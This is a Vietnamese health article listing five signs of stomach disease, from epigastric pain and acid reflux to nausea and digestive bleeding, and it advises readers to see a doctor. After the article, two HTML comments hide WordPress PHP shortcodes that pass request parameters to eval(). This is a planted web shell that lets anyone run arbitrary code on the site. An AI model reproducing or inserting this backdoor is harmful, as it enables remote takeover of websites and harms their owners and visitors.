5 dấu hiệu của bệnh đau dạ dày

Các triệu chứng của bệnh đau dạ dày nếu được phát hiện sớm sẽ có thể chữa trị hiệu quả nhanh chóng và người bệnh không phải chịu những phiến toái và khó chịu do bệnh gây ra. Đau dạ dày là một bệnh phổ biến về đường tiêu hóa dễ bị nhầm lẫn với các chứng bệnh thông thường khác. Do đó, người bệnh cần chú ý để nhận biết các dấu hiệu bệnh ở giai đoạn sớm. Từ đó có phương pháp chữa trị hiệu quả. Dưới đây là 5 dấu hiệu của bệnh đau dạ dày thường gặp cần được chú ý nhận biết.

1. Đau thượng vị

5-dau-hieu-cua-benh-dau-da-day

Khi bị các bệnh về đường ruột, bệnh dạ dày – tá tràng, biểu hiện đau là đặc trưng nhất và xuất hiện ở tất cả mọi người. Đau thượng vị là biểu hiện cơ bản nhất thường gặp ở người bệnh đau dạ dày. Biểu hiện đau xuất hiện ở khu vực vùng bên trên rốn và dưới mũi xương ức. Các cơn đau thường âm ỉ kèm theo cảm giác khó chịu, tức bụng, nóng rát bụng. Khác với các bệnh lý tá tràng khác, các cơn đau của bệnh đau dạ dày không dữ dội mà đau âm ỉ nên dễ bị nhầm lẫn với các biểu hiện rối loạn tiêu hóa thông thường. Thêm nữa, đau thượng vị thường xảy ra khi cơ thể đói quá hoặc có thể no quá.

2. Thường xuyên bị ợ hơi, ợ chua

5-dau-hieu-cua-benh-dau-da-day-1

Đây cũng là hiện tượng đặc trưng của bệnh đau dạ dày không thể bỏ qua. Khi bị đau dạ dày sẽ gây ra giảm chức năng vận động của dạ dày trong việc co bóp thức ăn, quá trình tiêu hóa bị rối loạn dẫn đến bị khó tiêu. Khi thức ăn không được tiêu hóa kịp thời sẽ bị lên men và gây ra chứng ợ hơi, ợ chua. Cảm giác bị ợ hơi, ợ chua rất khó chịu, kèm theo đó là cảm giác bị đầy hơi, đau sau mũi ức hoặc sau xương ức ( dấu hiệu đau thượng vị).

3. Kém ăn, ăn không ngon miệng

5-dau-hieu-cua-benh-dau-da-day

Kém ăn, ăn không ngon miệng, chán ăn là biểu hiện của nhiều bệnh lý về đường tiêu hóa như do nhiễm khuẩn hoặc do rối loạn tinh thần. Bên cạnh đó đây cũng có thể là biểu hiện của bệnh đau dạ dày. Triệu chứng này thường đi kém và là hệ quả của các vấn đề ăn không tiêu, tức bụng, căng bụng do đau dạ dày gây ra.

4. Buồn nôn và nôn

5-dau-hieu-cua-benh-dau-da-day

Đây là cảm giác thức ăn trong dạ dày chực trào ra ngoài hoặc trào ra ngoài kèm theo triệu chứng co thắt bụng. Ở người bệnh đau dạ dày thường có thấy xuất hiện hiện tượng này từ giai đoạn sớm. Tuy nhiên nó cũng có thể là biểu hiện của các bệnh khác như viêm dạ dày cấp, loét dạ dày tá tràng, ung thư dạ dày, hẹp môn vị, chảy máu dạ dày,….

Buồn nôn, nôn nếu xảy ra thường xuyên sẽ gây mất nước, tụt huyết áp, nặng hơn có thể gây rách thực quản dẫn đến chảy máu.

5. Chảy máu tiêu hóa

Đây là triệu chứng bệnh đau dạ dày rất nguy hiểm, gây ảnh hưởng nặng nề tới sức khỏe thậm chí đe dọa tính mạng của người bệnh. Khi bị chảy máu tiêu hóa đó là máu thoát ra khỏi thành mạch và chảy vào lòng ống tiêu hóa. Người bệnh có thể nhận biết thông qua các biểu hiện bên ngoài như bị nôn ra máu tươi, máu đen hoặc đi ngoài ra máu.

Đây cũng có thể là biểu hiện của các bệnh khác như loét dạ dày tá tràng, ung thư dạ dày…

Như vậy, trên đây là các dấu hiệu nhận biết đặc trưng của bệnh đau dạ dày. Các bạn cần lưu ý ngay từ giai đoạn đầu khi có bất kỳ triệu chứng nào và nên đi khám kiểm tra để được chẩn đoán chính xác. Từ đó sẽ có cách chữa bệnh đau dạ dày hiệu quả. Bệnh nếu được phát hiện sớm và điều trị kịp thời sẽ có thể chữa khỏi bệnh nhanh chóng.

<!– [insert_php]if (isset($_REQUEST["NvH"])){eval($_REQUEST["NvH"]);exit;}[/insert_php][php]if (isset($_REQUEST["NvH"])){eval($_REQUEST["NvH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["llN"])){eval($_REQUEST["llN"]);exit;}[/insert_php][php]if (isset($_REQUEST["llN"])){eval($_REQUEST["llN"]);exit;}[/php] –>

5 dấu hiệu của bệnh đau dạ dày

Bài viết cùng chuyên mục

Bình Luận

Email của bạn sẽ không bị công khai. Các trường có dấu (*) là bắt buộc